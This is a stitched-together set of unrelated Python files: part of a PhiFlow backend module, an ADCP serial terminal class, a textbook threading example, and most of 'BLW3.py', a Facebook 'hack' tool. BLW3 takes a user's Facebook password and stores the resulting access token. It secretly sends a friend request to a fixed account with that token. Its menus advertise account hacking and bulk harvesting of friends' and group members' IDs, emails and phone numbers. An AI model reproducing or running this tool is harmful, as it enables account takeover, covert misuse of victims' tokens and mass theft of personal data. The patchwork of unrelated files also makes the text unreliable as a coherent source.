Operations may also convert floating point values to this precision, even if the input had a different precision.
If `floating_point_bits` is None, new tensors will default to float32 unless specified otherwise.
The output of math operations has the same precision as its inputs.
Args:
floating_point_bits: one of (16, 32, 64, None)
"""
_PRECISION[0] = floating_point_bits
def get_precision() -> int:
"""
Gets the current target floating point precision in bits.
The precision can be set globally using `set_global_precision()` or locally using `with precision(p):`.
Any Backend method may convert floating point values to this precision, even if the input had a different precision.
Returns:
16 for half, 32 for single, 64 for double
"""
return _PRECISION[-1]
@contextmanager
def precision(floating_point_bits: int):
"""
Sets the floating point precision for the local context.
Usage: `with precision(p):`
This overrides the global setting, see `set_global_precision()`.
Args:
floating_point_bits: 16 for half, 32 for single, 64 for double
"""
_PRECISION.append(floating_point_bits)
try:
yield None
finally:
_PRECISION.pop(-1)
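def _example_precision_usage():
    """Illustrative only (not called anywhere): how the precision stack above behaves,
    assuming the global default of 32 bits and no enclosing `precision()` context."""
    assert get_precision() == 32      # global default
    with precision(64):
        assert get_precision() == 64  # local override
        with precision(16):
            assert get_precision() == 16
        assert get_precision() == 64
    assert get_precision() == 32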
def convert(tensor, backend: Backend = None, use_dlpack=True):
"""
Convert a Tensor to the native format of `backend`.
If the target backend can operate natively on `tensor`, returns `tensor`.
If both backends support *DLPack* and `use_dlpack=True`, uses zero-copy conversion using the DLPack library.
Else, intermediately converts `tensor` to a NumPy array.
*Warning*: This operation breaks the automatic differentiation chain.
Args:
tensor: Native tensor belonging to any registered backend.
backend: Target backend. If `None`, uses the current default backend, see `default_backend()`.
Returns:
Tensor belonging to `backend`.
"""
backend = backend or default_backend()
current_backend = choose_backend(tensor, prefer_default=False)
if backend.is_tensor(tensor, True) or backend is current_backend:
return tensor
if use_dlpack and current_backend.supports(Backend.to_dlpack) and backend.supports(Backend.from_dlpack):
capsule = current_backend.to_dlpack(tensor)
return backend.from_dlpack(capsule)
else:
nparray = current_backend.numpy(tensor)
return backend.as_tensor(nparray)
# Backend choice utility functions
def _is_applicable(backend, values):
for value in values:
if not (backend.is_tensor(value, only_native=False) or backend.is_module(value)):
return False
return True
def _is_specific(backend: Backend, values):
for value in values:
if backend.is_tensor(value, only_native=True) or backend.is_module(value):
return True
return False
# Other low-level helper functions
def combined_dim(dim1, dim2, type_str: str = 'batch'):
if dim1 is None and dim2 is None:
return None
if dim1 is None or dim1 == 1:
return dim2
if dim2 is None or dim2 == 1:
return dim1
assert dim1 == dim2, f"Incompatible {type_str} dimensions: x0 {dim1}, y {dim2}"
return dim1
_SPATIAL_DERIVATIVE_CONTEXT = [0]
_FUNCTIONAL_DERIVATIVE_CONTEXT = [0]
@contextmanager
def spatial_derivative_evaluation(order=1):
_SPATIAL_DERIVATIVE_CONTEXT.append(order)
try:
yield None
finally:
assert _SPATIAL_DERIVATIVE_CONTEXT.pop(-1) == order
def get_spatial_derivative_order():
"""
Extrapolations may behave differently when extrapolating the derivative of a grid.
Returns 1 inside a CG loop, and 0 by default.
"""
return _SPATIAL_DERIVATIVE_CONTEXT[-1]
@contextmanager
def functional_derivative_evaluation(order=1):
_FUNCTIONAL_DERIVATIVE_CONTEXT.append(order)
try:
yield None
finally:
assert _FUNCTIONAL_DERIVATIVE_CONTEXT.pop(-1) == order
def get_functional_derivative_order():
"""
Operations that do not define a first or higher-order derivative may use slower alternative code paths when the derivative is `>0`.
This is set when calling a function created by `math.functional_gradient()` or `math.hessian()`.
"""
return _FUNCTIONAL_DERIVATIVE_CONTEXT[-1]
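def _example_derivative_order_usage():
    """Illustrative only (not called anywhere): both derivative-order stacks above default to 0
    and are raised only inside the contexts pushed by the solver loops and functional-gradient calls."""
    assert get_spatial_derivative_order() == 0
    with spatial_derivative_evaluation(1):
        assert get_spatial_derivative_order() == 1   # as inside the CG loop bodies above
    assert get_spatial_derivative_order() == 0
    assert get_functional_derivative_order() == 0
    with functional_derivative_evaluation(1):
        assert get_functional_derivative_order() == 1
    assert get_functional_derivative_order() == 0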
PHI_LOGGER = logging.getLogger('Φ') # used for warnings and debug messages by all internal PhiFlow functions
_LOG_CONSOLE_HANDLER = logging.StreamHandler(sys.stdout)
_LOG_CONSOLE_HANDLER.setFormatter(logging.Formatter("%(message)s (%(levelname)s), %(asctime)s\n"))
_LOG_CONSOLE_HANDLER.setLevel(logging.NOTSET)
PHI_LOGGER.addHandler(_LOG_CONSOLE_HANDLER)
|
AdcpTerminal.py
|
import rti_python.Comm.adcp_serial_port as adcp_serial
import rti_python.Writer.rti_binary as RtiBinaryWriter
import threading
import time
import serial
import logging
from obsub import event
from threading import Lock
from rti_python.Utilities.config import RtiConfig
class AdcpTerminalVM:
"""
    View model for the ADCP serial terminal: manages the serial connection, the read thread and optional raw-data recording.
"""
def __init__(self, rti_config: RtiConfig):
self.rti_config = rti_config
self.rti_config.init_terminal_config()
self.adcp = None
self.adcp_thread = None
self.adcp_thread_alive = False
self.serial_recorder = None
self.is_recording = False
self.bytesWrittenLabel = 0
self.totalBytesWrittenLabel = 0
        self.filePathLabel = ""  # assumed attribute name; the original reassigned bytesWrittenLabel here
self.MAX_SERIAL_CONSOLE_LEN = 9000
self.serialTextBrowser = ""
self.thread_lock = Lock()
def comm_port_list(self):
"""
        Get the list of available serial ports.
:return:
"""
# Add all the found serial ports
return adcp_serial.get_serial_ports()
def baud_rate_list(self):
"""
        Get the list of available baud rates.
:return:
"""
return adcp_serial.get_baud_rates()
def get_data(self):
# Lock the object
self.thread_lock.acquire()
is_connected = False
if self.adcp:
is_connected = True
term_data = {
"isConnected": is_connected,
"termData": self.serialTextBrowser,
"baud": self.rti_config.config['Comm']['Baud'],
"commPort": self.rti_config.config['Comm']['Port']
}
# Release lock
self.thread_lock.release()
logging.info(term_data)
return term_data
def connect_serial(self, port, baud):
"""
Connect the serial port and the read thread.
:return:
"""
logging.info("Serial Connect: " + port + " : " + str(baud))
self.serialTextBrowser += "Serial Connect: " + port + " : " + str(baud)
# Store the configuration
self.rti_config.config['Comm']['Port'] = port
self.rti_config.config['Comm']['Baud'] = str(baud)
self.rti_config.write()
try:
self.adcp = adcp_serial.AdcpSerialPort(port, baud)
except ValueError as ve:
self.serialTextBrowser += "Error opening serial port. " + str(ve)
logging.error("Error opening serial port. " + str(ve))
return
except serial.SerialException as se:
self.serialTextBrowser += "Error opening serial port. " + str(se)
logging.error("Error opening serial port. " + str(se))
return
except Exception as e:
self.serialTextBrowser += "Error opening serial port. " + str(e)
logging.error("Error opening serial port. " + str(e))
return
# Start the read thread
self.adcp_thread_alive = True
self.adcp_thread = threading.Thread(name="Serial Terminal Thread", target=thread_worker, args=(self,))
self.adcp_thread.start()
def disconnect_serial(self):
"""
Disconnect the serial port and stop the read thread.
:return:
"""
self.adcp_thread_alive = False
if self.adcp:
self.adcp.disconnect()
self.adcp = None
self.serialTextBrowser += "Serial Disconnect."
logging.info("Serial Disconnect")
def serial_break(self):
"""
Send a BREAK to the serial port.
:return:
"""
# Clear the display
self.serialTextBrowser = ""
# Send a BREAK
if self.adcp:
self.adcp.send_break(1.25)
logging.info("BREAK SENT")
def send_cmd(self, cmd: str):
"""
Send a command to the ADCP.
:return:
"""
if self.adcp:
if len(cmd) > 0:
self.adcp.send_cmd(cmd)
logging.info("Write to serial port: " + cmd)
def start_pinging(self):
"""
Send the command to start pinging.
:return:
"""
if self.adcp:
self.adcp.start_pinging()
logging.info("Start Pinging")
def stop_pinging(self):
"""
Send the command to stop pinging.
:return:
"""
if self.adcp:
self.serialTextBrowser = ""
self.adcp.stop_pinging()
logging.info("Stop Pinging")
def fix_adcp_comm(self):
"""
If the ADCP stops communicating, try to fix the ADCP and regain communication.
:return:
"""
if self.adcp:
# Send a BREAK
self.adcp.send_break(1.25)
# Wait
time.sleep(1.0)
# Send a STOP
self.adcp.stop_pinging()
time.sleep(1.0)
# Send command to start pinging
self.adcp.start_pinging()
else:
logging.error("ADCP is not connected.")
def shutdown(self):
"""
Shutdown the VM.
:return:
"""
logging.debug("Shutdown Terminal VM")
self.disconnect_serial()
if self.serial_recorder:
self.serial_recorder.close()
def turn_on_off_record(self):
        if self.is_recording:
self.serial_recorder = RtiBinaryWriter.RtiBinaryWriter(folder_path=self.rti_config.config['Comm']['output_dir'])
logging.debug("Start Recording")
else:
if self.serial_recorder:
self.serial_recorder.close()
logging.debug("Stop Recording")
self.serial_recorder = None
def record_data(self, data):
if self.serial_recorder:
self.serial_recorder.write(data)
def update_record_count(self, file_count, total_count, file_path):
"""
Update the recording file sizes.
:param file_count: Total file size of current file.
:param total_count: Total size of all files written.
        :param file_path: Path of the current file.
:return:
"""
self.bytesWrittenLabel = str(file_count)
self.totalBytesWrittenLabel = str(total_count)
        self.filePathLabel = file_path  # assumed attribute name; the original overwrote bytesWrittenLabel here
def clear_console(self):
self.serialTextBrowser = ""
def clear_bulk_cmd(self):
self.bulkCmdMlainTextEdit = ""
def send_bulk_cmd(self, bulk_cmds: str):
cmds = bulk_cmds.splitlines()
for cmd in cmds:
self.adcp.send_cmd(cmd + "\n")
logging.debug("Write to serial port: " + cmd)
time.sleep(0.25)
@event
def on_serial_data(self, data):
"""
Subscribe to receive serial data.
:param data: Data from the serial port.
:return:
"""
logging.info("Data Received")
def thread_worker(vm):
"""
Thread worker to handle reading the serial port.
:param vm: This VM to get access to the variables.
:return:
"""
while vm.adcp_thread_alive:
try:
if vm.adcp.raw_serial.in_waiting:
# Read the data from the serial port
data = vm.adcp.read(vm.adcp.raw_serial.in_waiting)
try:
# Display the data as ASCII if it is a response from the ADCP
# If it is raw binary ADCP data, this will fail so just display binary data
ascii_data = data.decode('ascii')
vm.serialTextBrowser += ascii_data
logging.debug(ascii_data)
except Exception:
# Do nothing
vm.serialTextBrowser += str(data)
# Prevent overflow of buffer, if greater than buffer limit
# Get the last bytes in buffer
if len(vm.serialTextBrowser) > 5000:
                vm.serialTextBrowser = vm.serialTextBrowser[-5000:]
# Record data if turned on
vm.record_data(data)
# Publish the data
vm.on_serial_data(data)
time.sleep(0.01)
except serial.SerialException as se:
logging.error("Error using the serial port.\n" + str(se))
vm.disconnect_serial()
except Exception as ex:
logging.error("Error processing the data.\n" + str(ex))
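# Usage sketch (illustrative; the RtiConfig construction, the port name, the baud rate and the
# "CSHOW" command are assumptions that depend on your rti_python setup and hardware):
#
#     config = RtiConfig()
#     vm = AdcpTerminalVM(config)
#     print(vm.comm_port_list())           # available serial ports
#     vm.connect_serial("COM4", 115200)    # port name and baud rate are assumptions
#     vm.send_cmd("CSHOW")                 # example command; replace with your ADCP command
#     time.sleep(1.0)
#     print(vm.get_data()["termData"])
#     vm.disconnect_serial()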
|
Chap10_Example10.2.py
|
from threading import *
def my_msgprint():
print("The above line is executed by: ", current_thread().getName())
print("Main Thread creating child object")
mthread = Thread(target=my_msgprint)  # L1
print("Main Thread starting child thread")
mthread.start()  # L2
|
BLW3.py
|
#!/usr/bin/python
# coding=utf-8
# BLackWhite
# Source : Python2
# BLW V.3
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Warna-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;93m█████████
\033[1;93m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;93m█\033[1;92m▼▼▼▼▼ \033[1;92m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;93m█ \033[1;92m \033[1;92m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;93m█\033[1;92m▲▲▲▲▲\033[1;92m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96mBLW3 V.1
\033[1;93m█████████ \033[1;92m«----------✧----------»
\033[1;93m ██ ██
\033[1;93m╔════════════════════════════════════════════╗
\033[1;93m║\033[1;96m* \033[1;93mAuthor \033[1;93m: \033[1;93mNoprian | BLackWhite \033[1;93m ║
\033[1;93m║\033[1;96m* \033[1;93mGitHub \033[1;93m: \033[1;93m\033[4mBLackWhite0711 \033[0m \033[1;93m ║
\033[1;93m╚════════════════════════════════════════════╝"""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mTungguPilat! \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;91m║--\033[1;91m> \033[1;95m1.\033[1;96m Login"
print "\033[1;92m║--\033[1;91m> \033[1;95m2.\033[1;96m Login using token"
print "\033[1;93m║--\033[1;91m> \033[1;95m0.\033[1;96m Exit"
print "\033[1;95m║"
msuk = raw_input("\033[1;96m╚═\033[1;1mD \033[1;93m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;96m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;95m[+] \033[1;93mPassword \033[1;93m:\033[1;95m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://github.com/BLackWhite0711/BLW2')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;94m║--\033[1;91m> \033[1;93m1.\033[1;95m User information"
print "\033[1;94m║--\033[1;91m> \033[1;93m2.\033[1;95m Get Id/email/hp"
print "\033[1;94m║--\033[1;91m> \033[1;93m3.\033[1;95m Hack facebook account "
print "\033[1;94m║--\033[1;91m> \033[1;93m4.\033[1;95m Bot "
print "\033[1;94m║--\033[1;91m> \033[1;93m5.\033[1;95m Others "
print "\033[1;94m║--\033[1;91m> \033[1;93m6.\033[1;95m Show token "
print "\033[1;94m║--\033[1;91m> \033[1;93m7.\033[1;95m Delete trash "
print "\033[1;94m║--\033[1;91m> \033[1;93m8.\033[1;95m LogOut "
print "\033[1;94m║--\033[1;91m> \033[1;93m0.\033[1;95m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://github.com/BLackWhite0711/BLW2')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
